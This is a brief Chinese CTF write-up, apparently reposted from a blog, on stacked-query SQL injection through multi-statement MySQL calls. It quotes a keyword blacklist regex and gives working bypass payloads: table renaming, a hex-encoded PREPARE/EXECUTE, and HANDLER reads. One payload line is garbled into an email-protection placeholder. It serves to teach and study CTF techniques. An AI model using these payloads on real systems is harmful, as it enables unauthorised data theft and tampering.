漏洞成因
- 使用
mysqli_multi_query()
这种支持多语句执行的函数 - 使用PDO的方式进行数据查询,创建PDO实例时
PDO::MYSQL_ATTR_MULTI_STATEMENTS
设置为true
时,可以执行多语句
bypass技巧
以[GYCTF2020]Blacklist为例
preg_match("/set|prepare|alter|rename|select|update|delete|drop|insert|where|\./i",$inject)
获取库名、表名、列名
show databases;
show tables;
show columns from `table_name`;
bypass
(1) 修改表名
此时拼接sql语句的代码肯定是固定从一个表里取出某列的数据,这时候我们修改表名,取出数据来
1';
alter table words rename to words1;
alter table `1919810931114514` rename to words;
alter table words change flag id varchar(50);#
但是一定要先改原表名
(2) 预编译
1';
[email protected]=0x73656c656374202a2066726f6d20603139313938313039333131313435313460;
prepare execsql from @a;
execute execsql;#
用16进制绕过
(3) HANDLER
在这次比赛中set
,rename
都被过滤,去翻文档可以找到https://dev.mysql.com/doc/refman/8.0/en/handler.html
1';
HANDLER FlagHere OPEN;
HANDLER FlagHere READ FIRST;
HANDLER FlagHere CLOSE;#
例题
[GYCTF2020]Blacklist
[强网杯 2019]随便注
原文地址:https://www.cnblogs.com/20175211lyz/p/12356678.html
时间: 2024-11-07 19:51:48